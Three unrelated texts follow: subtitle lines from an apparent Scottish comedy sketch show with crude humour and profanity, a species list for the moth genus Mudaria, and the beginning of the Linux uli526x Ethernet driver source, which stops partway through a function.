sketch... ♪\" \"You want to watch Rembrandt sketch?\" \"", "He wouldnae let ye.\" \"", "Artists are notorious for no' letting anybody see their work before it's finished, so... ♪ I want to talk theory with Curie... ♪\" \"Curie?\" \"", "Marie Curie?\" \"", "You want to talk about the theory of radioactivity wi' Marie Curie?\" \"", "Donna, you wouldnae have a clue what she was on aboot.\" \"", "Even if you could speak Polish.\" \"", "♪ Ooh, impossible, I guess... ♪\" \"You said it.\" \"(", "TRADITIONAL SCOTTISH MUSIC PLAYS)\" \"(DISTANT VOICES)\" \"(THEY SPEAK MOCK LATIN)\" \"What's gaun oan here, like?\" \"", "We need to talk.\" \" ", "What aboot?\" \" ", "I want to split up.\" \" ", "Split up?\" \"", "Wha' for?\" \" ", "I'm fed up.\" \"", "Really fed up.\" \"", "I've been fed up for years.\" \"", "We don't go oot, we don't dae anything'.\" \"", "I don't understaun, this is oot the blue.\" \"", "I thought we were getting oan.\" \"", "What's happened?\" \"", "Nothing's happened, that's what's wrang.\" \"", "I feel like...\" \"I feel like I'm...\" \"We're no'...\" \"We're no' what?\" \"", "What's wrang?\" \"", "Och, I don't know.\" \" ", "I'm talking shite, just forget it.\" \" ", "Is everything all right?\" \"", "Aye.\" \"(", "PHONE RINGS IN DISTANCE)\" \"Hello, reception.\" \" ", "Cathy, have the police called today?\" \" ", "No.\" \"", "Have they been in the building at any point?\" \"", "Not that I'm aware of.\" \"", "Are you expecting them?\" \"", "No, no, not at all, just checking, thank you.\" \"", "OK.\" \"", "That's no call for complacency, the police could walk in the door at any moment, and you don't have a story.\" \"\"", "Hello, officer, how can I help you?\"\" \"\"", "Er, Mr Mulvaney, do you reside anywhere near the Drumchapel area of Glasgow?\"\" \"\"", "Drumchapel?\" \"", "Nowhere near it, fortunately.\" \"", "Er, why?\"\" \"\"", "Ah, well, eh, last night an incident occurred between the hours of...\"\" \"\"I see, well, that's, er, that's quite depressing.\" \"\"", "It's incidents like that that give Drumchapel a bad name.\" \"\"", "I hope you catch the chap.\"\" \"\"", "Er, well, Mr Mulvaney, we actually have reason to believe that it was you who...\"\" \"\"Me?\" \"!\" \"\"", "Are you joking?\" \"\"", "Officer, I'm 62 years of age.\" \"\"", "Why on earth would I vandalise a bus shelter?\"\" \"\"", "Er, well, written on the bus shelter was a name and it said...\"\" \"\"But there must be thousands of Mulvaneys out there.\" \"\"", "What makes you think it was this one?\"\" \" ", "Oh, that's good, that was...\" \" (PHONE RINGS)\" \"\"And if I was to write my name on a bus shelter, officer,\" \"\"I don't think I'd use a lighter.\"\" \"", "Cathy?\" \"", "Mr McMillan rang to say that the accounts are ready for you now.\" \"", "Oh, that's great.\" \"", "And Cathy, if the police do arrive,\" \" you can just send them right on in.\" \" ", "No bother.\" \"\"", "But officer, there must be thousands of Mulvaneys out there.\"\" \"", "Oh, that's go-o-o-o-od.\" \"", "There are girls in your area!\" \"", "Girls in your area!\" \"", "Right here, right now!\" \"", "Girls!\" \"(", "ELECTRONIC THROBBING INCREASING IN PITCH)\" \"Oh, sometimes it's just a bit too... pow!\" \"", "Pow!\" \"", "Do you know what I mean?\" \"", "All right, I tell you what we're gonna do, we're gonna get a divorce.\" \"", "For what you did to me, we're gonna get a divorce,\" \"I'm gonna get the kids, and I'm gonna bring them up to hate you!\" \"", "Computer, locate this man.\" \"", "Located.\" \" ", "On screen.\" \" ", "On screen.\" \"", "Computer, activate the teleportation portal.\" \"", "Activated.\" \"", "Computer, position the destination portal just behind that lassie's arse, eh?\" \"", "Positioned.\" \"", "Oh!\" \"", "Oh, no, this is childish.\" \"", "This is childish.\" \"", "If you're still using a phone box in this day and age, then you're either a drug addict or a drug dealer or something like that.\" \"", "Fact.\" \"", "She's here.\" \"(", "AMERICAN ACCENT) Dance for me.\" \"(", "MUSIC PLAYS)\" \"That's it.\" \"", "Do your little turn.\" \"", "Yeah, that's it.\" \"", "You got it.\" \"", "You got it good!\" \"", "Yeah.\" \"", "Yeah.\" \"", "Do your little turn.\" \"", "Dance, dance, dance!\" \"", "Yo, daddy-o.\" \"Oh!\" \"", "Who, me?\" \"", "No, him.\" \"", "Aye, these blondes.\" \"", "You know, these blonde lassies.\" \"", "That's aw you hear aboot a leggy blonde, a sexy blonde, innit?\" \"", "Aye.\" \"", "Aye, well, here's what they don't tell ye.\" \"", "See when wan aw them comes ower here frae Sweden - cos that's where they aw come frae - they cannae believe their luck.\" \"", "All of a sudden, everybody wants their wicked way wi' them.\" \"", "Whereas back hame, they don't get a second look.\" \" ", "Do you want to know why that is?\" \" ", "Why?\" \"", "Cos, see in Sweden, d'you know what a blonde is?\" \"", "What?\" \"", "A ginger.\" \"", "Blondes are ginger.\" \"", "Shit!\" \"", "Fucking...\" \"I was in ma kitchen, right?\" \"", "Checkin'to see if my T-shirt was dry, right?\" \"", "And I just burst oot laughing'.\" \"", "Cos on the label of my T-shirt, it said \"George\" cos I got it frae Asda.\" \"", "And it was as if, every time I leave the kitchen, everything in the kitchen springs tae life.\" \"", "Like Toy Story.\" \"", "And his name's George.\" \"", "I was pissin'masel'.\" \"", "Just imagine the slagging'he must get frae the rest of the kitchen, like that, fuckin'... ♪ Georgie Porgie, pudding and pie Kissed the girls and made them cry. ", "♪\" \"But then I thought, \"Naw, maybe no'.\"\" \"", "Don't get me wrang, I've got nae doubt that his nickname's Georgie Porgie, but it might be one of they nicknames that they don't dare call him to his face, like Joe Bananas.\" \"", "Cos if ye ever called Joe Bananas \"Joe Bananas\", he'd fuckin' go bananas.\" \"", "Well, maybe if ye call Georgie Porgie \"Georgie Porgie\", he fuckin' goes bananas.\" \"", "But then I thought, \"Naw, maybe no'.\"\" \"", "Cos it's no' as if a T-shirt's gonnae be the hard man of the kitchen.\" \"", "That would probably be... the kitchen knife.\" \"", "But then I thought, \"Naw, haud oan.\"\" \"", "Kitchen knife in a fight against the frying pan - frying pan would win.\" \"", "Kitchen knife in a fight against the chopping board - chopping board would win.\" \"", "Chopping board widnae even feel it.\" \"", "Chopping boards are made to no'gie a fuck aboot kitchen knives.\" \"", "Kitchen knife in a fight against me?\" \"", "Aye, the kitchen knife would win then.\" \"", "But I'm the only wan in the kitchen the kitchen knife would win against.\" \"", "And I just thought that I bet the rest of the kitchen are onto that and pure take the piss oot the kitchen knife, bullying'it, grog oan it.\" \"", "And that got me worried.\" \"", "Cos it reminded me of they schoolboys you get in America that get bullied.\" \"", "But then they come into school wan day and kill everybody.\" \"", "And cos I'm the only wan in the kitchen the kitchen knife can kill, aye, that got me worried.\" \"", "So I just thought, \"Look, you've came in, you've checked your T-shirt,\" \"\"it's no'dry yet, just get oot and leave 'em tae it.\"\" \"", "Noo, I'm no'sayin'that my kitchen actually does come to life when I leave, right?\" \"", "I'm no'mental or anything.\" \"", "But see as I was walkin'oot, see ma frying pan,\" \"I gave it a wee dunt.\" \"", "I gave it a wee dunt in front of the kitchen knife.\" \"", "Just in case.\" \"", "One.\" \"", "Two.\" \"", "Three.\" \"", "Pick a number.\" \"", "If you picked two...\" \"Square.\" \"", "Circle.\" \"", "Triangle.\" \"", "Pick a shape.\" \"", "If you picked triangle...\" \"Red.\" \"", "Green.\" \"", "Blue.\" \"", "Pick a colour.\" \"", "If you picked red, you're out.\" \"", "If you picked blue, you're out.\" \"", "But if you picked green...\" \"All right, folks, how are you doing?\" \"", "Aye, great to be here.\" \"", "Thank you.\" \"", "Oh, aye, look at this place...\" \"Yes, er...\" \"How are you doing, sir, all right?\" \"", "How are you doing?\" \"", "What's your name?\" \"", "Aye.\" \"", "What do you do, mate?\" \"", "You're a?\" \"", "You're a?\" \"", "Ooooh!\" \"", "Whooo!\" \"", "Only kidding, mate.\" \"", "Thanks for coming.\" \"", "Aye.\" \"", "What about you, mate?\" \"", "What's your name?\" \"", "What do you do?\" \"", "You're a?\" \"", "Oh, you're joking!\" \"", "Ye'll be able to...\" \"I'm only kidding.\" \"", "So, who's this?\" \"", "Are you two together, aye?\" \"", "That wee?\" \"", "Oh!\" \"", "I'm only kidding.\" \"", "No, seriously, it's good to be here.\" \"", "Absolutely fantastic.\" \"", "I'll be honest with you, I've got...\" \"I know.\" \"", "One, two, three...\" \"Right.\" \"", "Oh, right!\" \"", "Aye, but...\" \"So there I was the other day...\" \"So I walks in.\" \"", "Guy goes like that, you know...\" \"So I says, er, \"I don't know...\"\" \"Says, \"Are you?\"\" \"", "I says, \"Who, me?\"\" \"", "Thank you very much!\" \"", "Good night.\" \"(", "HE CHUCKLES) Ahh!\" \"", "Are you finished in here?\" \" ", "What?\" \" ", "Are you finished in here?\" \"", "Aye, that's me finished.\" \"(", "HE MOUTHS)\" \"I know what you're thinking, lads.\" \"", "And I used to think the exact same thing masel'.\" \"", "Why does every statue I see seem to have a bigger cock than me?\" \"", "Until I realised why.\" \"", "Look.\" \"", "Nae pubes.\" \"", "Noo, it doesnae bother me at aw.\" \"", "Ah!\" \"", "Well, ladies and gents, that's the end of the show.\" \"", "Thanks for watching.\" \"", "But before ye go, I'd like to leave you wi' a wee story aboot how ma auntie lost her sight.\" \"", "She was aboot eight years auld.\" \"", "An' she was sneakin' aboot her maw's bedroom, just tryin' on her make-up, and tryin' on her high heels, usual stuff that wee lassies dae.\" \"", "An' she came across her maw's contact lenses.\" \"", "Noo, back in they days, contact lenses were made o' glass.\" \"", "Really dangerous to wear, especially for a wee lassie.\" \"", "But ma auntie didnae know that.\" \"", "So what she did was, she put this lens, this piece o' glass, on her eye.\" \"", "A piece o' glass, it was the wrang size, wrang shape for her eyeball.\" \"", "Then she blinked.\" \"", "And what actually happened wis - and this is horrible - what actually happened wis...\" \"Look at ye.\" \"", "You'd love to know, wouldn't ye?\" \"", "You'd love to know.\" \"", "Here's me aboot to tell ye how a wee lassie lost her sight efter putting' a bit a glass in her eye.\" \"", "And there's you, perched on the edge of your seat, like that,\" \"\"Oh, yes, cannae wait to find oot what happens next!\" \"\"", "Do continue, please, do go on.\"\" \"", "You know what the thing is, an' aw?\" \"", "I just made it up.\" \"", "Just...\" \"I don't know.\" \"", "What's wrang wi' us?\" \"", "End o' the show.\" \" (", "THEME MUSIC PLAYS)\" \" No.\" \"", "Music aff.\" \"", "Get... (MUSIC FADES)\" \"What's wrang wi' us?\" \"", "Ripped By mstoll\"" ]
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[ "Mudaria\n\nMudaria is a genus of moths of the family Noctuidae.", "\n\nSpecies\n Mudaria albonotata (Hampson, 1893)\n Mudaria arida (Rothschild, 1913)\n Mudaria cornifrons Moore, 1893\n Mudaria fisherae Prout, 1928\n Mudaria gigas (Holloway, 1982)\n Mudaria leprosa (Hampson, 1898)\n Mudaria leprosticta (Hampson, 1907)\n Mudaria luteileprosa Holloway, 1989\n Mudaria magniplaga (Walker, 1858)\n Mudaria major (Warren, 1914)\n Mudaria minor (Holloway, 1982)\n Mudaria minoroides Holloway, 1989\n Mudaria nubes (Kobes, 1982)\n Mudaria rudolfi (Kobes, 1982)\n Mudaria solidata (Warren, 1914)\n Mudaria tayi (Holloway, 1976)\n Mudaria turbata (Walker, 1858)\n Mudaria variabilis Roepke, 1916\n Mudaria wallacea (Holloway, 1982)\n\nReferences\nNatural History Museum Lepidoptera genus database\nMudaria at funet\n\nCategory:Hadeninae" ]
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[ "// SPDX-License-Identifier: GPL-2.0-or-later\n/*\n\n\n*/\n\n#define pr_fmt(fmt) KBUILD_MODNAME \": \" fmt\n\n#define DRV_NAME\t\"uli526x\"\n\n#include <linux/module.h>\n\n#include <linux/kernel.h>\n#include <linux/string.h>\n#include <linux/timer.h>\n#include <linux/errno.h>\n#include <linux/ioport.h>\n#include <linux/interrupt.h>\n#include <linux/pci.h>\n#include <linux/init.h>\n#include <linux/netdevice.h>\n#include <linux/etherdevice.h>\n#include <linux/ethtool.h>\n#include <linux/skbuff.h>\n#include <linux/delay.h>\n#include <linux/spinlock.h>\n#include <linux/dma-mapping.h>\n#include <linux/bitops.h>\n\n#include <asm/processor.h>\n#include <asm/io.h>\n#include <asm/dma.h>\n#include <linux/uaccess.h>\n\n#define uw32(reg, val)\tiowrite32(val, ioaddr + (reg))\n#define ur32(reg)\tioread32(ioaddr + (reg))\n\n/* Board/System/Debug information/definition ---------------- */\n#define PCI_ULI5261_ID 0x526110B9\t/* ULi M5261 ID*/\n#define PCI_ULI5263_ID 0x526310B9\t/* ULi M5263 ID*/\n\n#define ULI526X_IO_SIZE 0x100\n#define TX_DESC_CNT 0x20 /* Allocated Tx descriptors */\n#define RX_DESC_CNT 0x30 /* Allocated Rx descriptors */\n#define TX_FREE_DESC_CNT (TX_DESC_CNT - 2)\t/* Max TX packet count */\n#define TX_WAKE_DESC_CNT (TX_DESC_CNT - 3)\t/* TX wakeup count */\n#define DESC_ALL_CNT (TX_DESC_CNT + RX_DESC_CNT)\n#define TX_BUF_ALLOC 0x600\n#define RX_ALLOC_SIZE 0x620\n#define ULI526X_RESET 1\n#define CR0_DEFAULT 0\n#define CR6_DEFAULT 0x22200000\n#define CR7_DEFAULT 0x180c1\n#define CR15_DEFAULT 0x06 /* TxJabber RxWatchdog */\n#define TDES0_ERR_MASK 0x4302 /* TXJT, LC, EC, FUE */\n#define MAX_PACKET_SIZE 1514\n#define ULI5261_MAX_MULTICAST 14\n#define RX_COPY_SIZE\t100\n#define MAX_CHECK_PACKET 0x8000\n\n#define ULI526X_10MHF 0\n#define ULI526X_100MHF 1\n#define ULI526X_10MFD 4\n#define ULI526X_100MFD 5\n#define ULI526X_AUTO 8\n\n#define ULI526X_TXTH_72\t0x400000\t/* TX TH 72 byte */\n#define ULI526X_TXTH_96\t0x404000\t/* TX TH 96 byte */\n#define ULI526X_TXTH_128\t0x0000\t\t/* TX TH 128 byte */\n#define ULI526X_TXTH_256\t0x4000\t\t/* TX TH 256 byte */\n#define ULI526X_TXTH_512\t0x8000\t\t/* TX TH 512 byte */\n#define ULI526X_TXTH_1K\t0xC000\t\t/* TX TH 1K byte */\n\n#define ULI526X_TIMER_WUT (jiffies + HZ * 1)/* timer wakeup time : 1 second */\n#define ULI526X_TX_TIMEOUT ((16*HZ)/2)\t/* tx packet time-out time 8 s\" */\n#define ULI526X_TX_KICK \t(4*HZ/2)\t/* tx packet Kick-out time 2 s\" */\n\n#define ULI526X_DBUG(dbug_now, msg, value)\t\t\t\\\ndo {\t\t\t\t\t\t\t\t\\\n\tif (uli526x_debug || (dbug_now))\t\t\t\\\n\t\tpr_err(\"%s %lx\\n\", (msg), (long) (value));\t\\\n} while (0)\n\n#define SHOW_MEDIA_TYPE(mode)\t\t\t\t\t\\\n\tpr_err(\"Change Speed to %sMhz %s duplex\\n\",\t\t\\\n\t mode & 1 ? \"", "100\" : \"10\",\t\t\t\t\\\n\t mode & 4 ? \"", "full\" : \"half\");\n\n\n/* CR9 definition: SROM/MII */\n#define CR9_SROM_READ 0x4800\n#define CR9_SRCS 0x1\n#define CR9_SRCLK 0x2\n#define CR9_CRDOUT 0x8\n#define SROM_DATA_0 0x0\n#define SROM_DATA_1 0x4\n#define PHY_DATA_1 0x20000\n#define PHY_DATA_0 0x00000\n#define MDCLKH 0x10000\n\n#define PHY_POWER_DOWN\t0x800\n\n#define SROM_V41_CODE 0x14\n\n/* Structure/enum declaration ------------------------------- */\nstruct tx_desc {\n __le32 tdes0, tdes1, tdes2, tdes3; /* Data for the card */\n char *tx_buf_ptr; /* Data for us */\n struct tx_desc *next_tx_desc;\n} __attribute__(( aligned(32) ));\n\nstruct rx_desc {\n\t__le32 rdes0, rdes1, rdes2, rdes3; /* Data for the card */\n\tstruct sk_buff *rx_skb_ptr;\t/* Data for us */\n\tstruct rx_desc *next_rx_desc;\n} __attribute__(( aligned(32) ));\n\nstruct uli526x_board_info {\n\tstruct uli_phy_ops {\n\t\tvoid (*write)(struct uli526x_board_info *, u8, u8, u16);\n\t\tu16 (*read)(struct uli526x_board_info *, u8, u8);\n\t} phy;\n\tstruct net_device *next_dev;\t/* next device */\n\tstruct pci_dev *pdev;\t\t/* PCI device */\n\tspinlock_t lock;\n\n\tvoid __iomem *ioaddr;\t\t/* I/O base address */\n\tu32 cr0_data;\n\tu32 cr5_data;\n\tu32 cr6_data;\n\tu32 cr7_data;\n\tu32 cr15_data;\n\n\t/* pointer for memory physical address */\n\tdma_addr_t buf_pool_dma_ptr;\t/* Tx buffer pool memory */\n\tdma_addr_t buf_pool_dma_start;\t/* Tx buffer pool align dword */\n\tdma_addr_t desc_pool_dma_ptr;\t/* descriptor pool memory */\n\tdma_addr_t first_tx_desc_dma;\n\tdma_addr_t first_rx_desc_dma;\n\n\t/* descriptor pointer */\n\tunsigned char *buf_pool_ptr;\t/* Tx buffer pool memory */\n\tunsigned char *buf_pool_start;\t/* Tx buffer pool align dword */\n\tunsigned char *desc_pool_ptr;\t/* descriptor pool memory */\n\tstruct tx_desc *first_tx_desc;\n\tstruct tx_desc *tx_insert_ptr;\n\tstruct tx_desc *tx_remove_ptr;\n\tstruct rx_desc *first_rx_desc;\n\tstruct rx_desc *rx_insert_ptr;\n\tstruct rx_desc *rx_ready_ptr;\t/* packet come pointer */\n\tunsigned long tx_packet_cnt;\t/* transmitted packet count */\n\tunsigned long rx_avail_cnt;\t/* available rx descriptor count */\n\tunsigned long interval_rx_cnt;\t/* rx packet count a callback time */\n\n\tu16 dbug_cnt;\n\tu16 NIC_capability;\t\t/* NIC media capability */\n\tu16 PHY_reg4;\t\t\t/* Saved Phyxcer register 4 value */\n\n\tu8 media_mode;\t\t\t/* user specify media mode */\n\tu8 op_mode;\t\t\t/* real work media mode */\n\tu8 phy_addr;\n\tu8 link_failed;\t\t\t/* Ever link failed */\n\tu8 wait_reset;\t\t\t/* Hardware failed, need to reset */\n\tstruct timer_list timer;\n\n\t/* Driver defined statistic counter */\n\tunsigned long tx_fifo_underrun;\n\tunsigned long tx_loss_carrier;\n\tunsigned long tx_no_carrier;\n\tunsigned long tx_late_collision;\n\tunsigned long tx_excessive_collision;\n\tunsigned long tx_jabber_timeout;\n\tunsigned long reset_count;\n\tunsigned long reset_cr8;\n\tunsigned long reset_fatal;\n\tunsigned long reset_TXtimeout;\n\n\t/* NIC SROM data */\n\tunsigned char srom[128];\n\tu8 init;\n};\n\nenum uli526x_offsets {\n\tDCR0 = 0x00, DCR1 = 0x08, DCR2 = 0x10, DCR3 = 0x18, DCR4 = 0x20,\n\tDCR5 = 0x28, DCR6 = 0x30, DCR7 = 0x38, DCR8 = 0x40, DCR9 = 0x48,\n\tDCR10 = 0x50, DCR11 = 0x58, DCR12 = 0x60, DCR13 = 0x68, DCR14 = 0x70,\n\tDCR15 = 0x78\n};\n\nenum uli526x_CR6_bits {\n\tCR6_RXSC = 0x2, CR6_PBF = 0x8, CR6_PM = 0x40, CR6_PAM = 0x80,\n\tCR6_FDM = 0x200, CR6_TXSC = 0x2000, CR6_STI = 0x100000,\n\tCR6_SFT = 0x200000, CR6_RXA = 0x40000000, CR6_NO_PURGE = 0x20000000\n};\n\n/* Global variable declaration ----------------------------- */\nstatic int uli526x_debug;\nstatic unsigned char uli526x_media_mode = ULI526X_AUTO;\nstatic u32 uli526x_cr6_user_set;\n\n/* For module input parameter */\nstatic int debug;\nstatic u32 cr6set;\nstatic int mode = 8;\n\n/* function declaration ------------------------------------- */\nstatic int uli526x_open(struct net_device *);\nstatic netdev_tx_t uli526x_start_xmit(struct sk_buff *,\n\t\t\t\t\t struct net_device *);\nstatic int uli526x_stop(struct net_device *);\nstatic void uli526x_set_filter_mode(struct net_device *);\nstatic const struct ethtool_ops netdev_ethtool_ops;\nstatic u16 read_srom_word(struct uli526x_board_info *, int);\nstatic irqreturn_t uli526x_interrupt(int, void *);\n#ifdef CONFIG_NET_POLL_CONTROLLER\nstatic void uli526x_poll(struct net_device *dev);\n#endif\nstatic void uli526x_descriptor_init(struct net_device *, void __iomem *);\nstatic void allocate_rx_buffer(struct net_device *);\nstatic void update_cr6(u32, void __iomem *);\nstatic void send_filter_frame(struct net_device *, int);\nstatic u16 phy_readby_cr9(struct uli526x_board_info *, u8, u8);\nstatic u16 phy_readby_cr10(struct uli526x_board_info *, u8, u8);\nstatic void phy_writeby_cr9(struct uli526x_board_info *, u8, u8, u16);\nstatic void phy_writeby_cr10(struct uli526x_board_info *, u8, u8, u16);\nstatic void phy_write_1bit(struct uli526x_board_info *db, u32);\nstatic u16 phy_read_1bit(struct uli526x_board_info *db);\nstatic u8 uli526x_sense_speed(struct uli526x_board_info *);\nstatic void uli526x_process_mode(struct uli526x_board_info *);\nstatic void uli526x_timer(struct timer_list *t);\nstatic void uli526x_rx_packet(struct net_device *, struct uli526x_board_info *);\nstatic void uli526x_free_tx_pkt(struct net_device *, struct uli526x_board_info *);\nstatic void uli526x_reuse_skb(struct uli526x_board_info *, struct sk_buff *);\nstatic void uli526x_dynamic_reset(struct net_device *);\nstatic void uli526x_free_rxbuffer(struct uli526x_board_info *);\nstatic void uli526x_init(struct net_device *);\nstatic void uli526x_set_phyxcer(struct uli526x_board_info *);\n\nstatic void srom_clk_write(struct uli526x_board_info *db, u32 data)\n{\n\tvoid __iomem *ioaddr = db->ioaddr;\n\n\tuw32(DCR9, data | CR9_SROM_READ | CR9_SRCS);\n\tudelay(5);\n\tuw32(DCR9, data | CR9_SROM_READ | CR9_SRCS | CR9_SRCLK);\n\tudelay(5);\n\tuw32(DCR9, data | CR9_SROM_READ | CR9_SRCS);\n\tudelay(5);\n}\n\n/* ULI526X network board routine ---------------------------- */\n\nstatic const struct net_device_ops netdev_ops = {\n\t.ndo_open\t\t= uli526x_open,\n\t.ndo_stop\t\t= uli526x_stop,\n\t.ndo_start_xmit\t\t= uli526x_start_xmit,\n\t.ndo_set_rx_mode\t= uli526x_set_filter_mode,\n\t.ndo_set_mac_address\t= eth_mac_addr,\n\t.ndo_validate_addr\t= eth_validate_addr,\n#ifdef CONFIG_NET_POLL_CONTROLLER\n\t.ndo_poll_controller \t= uli526x_poll,\n#endif\n};\n\n/*\n *\tSearch ULI526X board, allocate space and register it\n */\n\nstatic int uli526x_init_one(struct pci_dev *pdev,\n\t\t\t const struct pci_device_id *ent)\n{\n\tstruct uli526x_board_info *db;\t/* board information structure */\n\tstruct net_device *dev;\n\tvoid __iomem *ioaddr;\n\tint i, err;\n\n\tULI526X_DBUG(0, \"uli526x_init_one()\", 0);\n\n\t/* Init network device */\n\tdev = alloc_etherdev(sizeof(*db));\n\tif (dev == NULL)\n\t\treturn -ENOMEM;\n\tSET_NETDEV_DEV(dev, &pdev->dev);\n\n\tif (pci_set_dma_mask(pdev, DMA_BIT_MASK(32))) {\n\t\tpr_warn(\"32-bit PCI DMA not available\\n\");\n\t\terr = -ENODEV;\n\t\tgoto err_out_free;\n\t}\n\n\t/* Enable Master/IO access, Disable memory access */\n\terr = pci_enable_device(pdev);\n\tif (err)\n\t\tgoto err_out_free;\n\n\tif (!", "pci_resource_start(pdev, 0)) {\n\t\tpr_err(\"I/O base is zero\\n\");\n\t\terr = -ENODEV;\n\t\tgoto err_out_disable;\n\t}\n\n\tif (pci_resource_len(pdev, 0) < (ULI526X_IO_SIZE) ) {\n\t\tpr_err(\"Allocated I/O size too small\\n\");\n\t\terr = -ENODEV;\n\t\tgoto err_out_disable;\n\t}\n\n\terr = pci_request_regions(pdev, DRV_NAME);\n\tif (err < 0) {\n\t\tpr_err(\"Failed to request PCI regions\\n\");\n\t\tgoto err_out_disable;\n\t}\n\n\t/* Init system & device */\n\tdb = netdev_priv(dev);\n\n\t/* Allocate Tx/Rx descriptor memory */\n\terr = -ENOMEM;\n\n\tdb->desc_pool_ptr = pci_alloc_consistent(pdev, sizeof(struct tx_desc) * DESC_ALL_CNT + 0x20, &db->desc_pool_dma_ptr);\n\tif (!", "db->desc_pool_ptr)\n\t\tgoto err_out_release;\n\n\tdb->buf_pool_ptr = pci_alloc_consistent(pdev, TX_BUF_ALLOC * TX_DESC_CNT + 4, &db->buf_pool_dma_ptr);\n\tif (!", "db->buf_pool_ptr)\n\t\tgoto err_out_free_tx_desc;\n\n\tdb->first_tx_desc = (struct tx_desc *) db->desc_pool_ptr;\n\tdb->first_tx_desc_dma = db->desc_pool_dma_ptr;\n\tdb->buf_pool_start = db->buf_pool_ptr;\n\tdb->buf_pool_dma_start = db->buf_pool_dma_ptr;\n\n\tswitch (ent->driver_data) {\n\tcase PCI_ULI5263_ID:\n\t\tdb->phy.write\t= phy_writeby_cr10;\n\t\tdb->phy.read\t= phy_readby_cr10;\n\t\tbreak;\n\tdefault:\n\t\tdb->phy.write\t= phy_writeby_cr9;\n\t\tdb->phy.read\t= phy_readby_cr9;\n\t\tbreak;\n\t}\n\n\t/* IO region. */", "\n\tioaddr = pci_iomap(pdev, 0, 0);\n\tif (!", "ioaddr)\n\t\tgoto err_out_free_tx_buf;\n\n\tdb->ioaddr = ioaddr;\n\tdb->pdev = pdev;\n\tdb->init = 1;\n\n\tpci_set_drvdata(pdev, dev);\n\n\t/* Register some necessary functions */\n\tdev->netdev_ops = &netdev_ops;\n\tdev->ethtool_ops = &netdev_ethtool_ops;\n\n\tspin_lock_init(&db->lock);\n\n\n\t/* read 64 word srom data */\n\tfor (i = 0; i < 64; i++)\n\t\t((__le16 *) db->srom)[i] = cpu_to_le16(read_srom_word(db, i));\n\n\t/* Set Node address */\n\tif(((u16 *) db->srom)[0] == 0xffff || ((u16 *) db->srom)[0] == 0)\t\t/* SROM absent, so read MAC address from ID Table */\n\t{\n\t\tuw32(DCR0, 0x10000);\t//Diagnosis mode\n\t\tuw32(DCR13, 0x1c0);\t//Reset dianostic pointer port\n\t\tuw32(DCR14, 0);\t\t//Clear reset port\n\t\tuw32(DCR14, 0x10);\t//Reset ID Table pointer\n\t\tuw32(DCR14, 0);\t\t//Clear reset port\n\t\tuw32(DCR13, 0);\t\t//Clear CR13\n\t\tuw32(DCR13, 0x1b0);\t//Select ID Table access port\n\t\t//Read MAC address from CR14\n\t\tfor (i = 0; i < 6; i++)\n\t\t\tdev->dev_addr[i] = ur32(DCR14);\n\t\t//Read end\n\t\tuw32(DCR13, 0);\t\t//Clear CR13\n\t\tuw32(DCR0, 0);\t\t//Clear CR0\n\t\tudelay(10);\n\t}\n\telse\t\t/*Exist SROM*/\n\t{\n\t\tfor (i = 0; i < 6; i++)\n\t\t\tdev->dev_addr[i] = db->srom[20 + i];\n\t}\n\terr = register_netdev (dev);\n\tif (err)\n\t\tgoto err_out_unmap;\n\n\tnetdev_info(dev, \"ULi M%04lx at pci%s, %pM, irq %d\\n\",\n\t\t ent->driver_data >> 16, pci_name(pdev),\n\t\t dev->dev_addr, pdev->irq);\n\n\tpci_set_master(pdev);\n\n\treturn 0;\n\nerr_out_unmap:\n\tpci_iounmap(pdev, db->ioaddr);\nerr_out_free_tx_buf:\n\tpci_free_consistent(pdev, TX_BUF_ALLOC * TX_DESC_CNT + 4,\n\t\t\t db->buf_pool_ptr, db->buf_pool_dma_ptr);\nerr_out_free_tx_desc:\n\tpci_free_consistent(pdev, sizeof(struct tx_desc) * DESC_ALL_CNT + 0x20,\n\t\t\t db->desc_pool_ptr, db->desc_pool_dma_ptr);\nerr_out_release:\n\tpci_release_regions(pdev);\nerr_out_disable:\n\tpci_disable_device(pdev);\nerr_out_free:\n\tfree_netdev(dev);\n\n\treturn err;\n}\n\n\nstatic void uli526x_remove_one(struct pci_dev *pdev)\n{\n\tstruct net_device *dev = pci_get_drvdata(pdev);\n\tstruct uli526x_board_info *db = netdev_priv(dev);\n\n\tunregister_netdev(dev);\n\tpci_iounmap(pdev, db->ioaddr);\n\tpci_free_consistent(db->pdev, sizeof(struct tx_desc) *\n\t\t\t\tDESC_ALL_CNT + 0x20, db->desc_pool_ptr,\n \t\t\t\tdb->desc_pool_dma_ptr);\n\tpci_free_consistent(db->pdev, TX_BUF_ALLOC * TX_DESC_CNT + 4,\n\t\t\t\tdb->buf_pool_ptr, db->buf_pool_dma_ptr);\n\tpci_release_regions(pdev);\n\tpci_disable_device(pdev);\n\tfree_netdev(dev);\n}\n\n\n/*\n *\tOpen the interface.", "\n *\tThe interface is opened whenever \"ifconfig\" activates it.", "\n */\n\nstatic int uli526x_open(struct net_device *dev)\n{\n\tint ret;\n\tstruct uli526x_board_info *db = netdev_priv(dev);\n\n\tULI526X_DBUG(0, \"uli526x_open\", 0);\n\n\t/* system variable init */\n\tdb->cr6_data = CR6_DEFAULT | uli526x_cr6_user_set;\n\tdb->tx_packet_cnt = 0;\n\tdb->rx_avail_cnt = 0;\n\tdb->link_failed = 1;\n\tnetif_carrier_off(dev);\n\tdb->wait_reset = 0;\n\n\tdb->NIC_capability = 0xf;\t/* All capability*/\n\tdb->PHY_reg4 = 0x1e0;\n\n\t/* CR6 operation mode decision */\n\tdb->cr6_data |= ULI526X_TXTH_256;\n\tdb->cr0_data = CR0_DEFAULT;\n\n\t/* Initialize ULI526X board */\n\tuli526x_init(dev);\n\n\tret = request_irq(db->pdev->irq, uli526x_interrupt, IRQF_SHARED,\n\t\t\t dev->name, dev);\n\tif (ret)\n\t\treturn ret;\n\n\t/* Active System Interface */\n\tnetif_wake_queue(dev);\n\n\t/* set and active a timer process */\n\ttimer_setup(&db->timer, uli526x_timer, 0);\n\tdb->timer.expires = ULI526X_TIMER_WUT + HZ * 2;\n\tadd_timer(&db->timer);\n\n\treturn 0;\n}\n\n\n/*\tInitialize ULI526X board\n *\tReset ULI526X board\n *\tInitialize TX/Rx descriptor chain structure\n *\tSend the set-up frame\n *\tEnable Tx/Rx machine\n */\n\nstatic void uli526x_init(struct net_device *dev)\n{\n\tstruct uli526x_board_info *db = netdev_priv(dev);\n\tstruct uli_phy_ops *phy = &db->phy;\n\tvoid __iomem *ioaddr = db->ioaddr;\n\tu8\tphy_tmp;\n\tu8\ttimeout;\n\tu16 phy_reg_reset;\n\n\n\tULI526X_DBUG(0, \"uli526x_init()\", 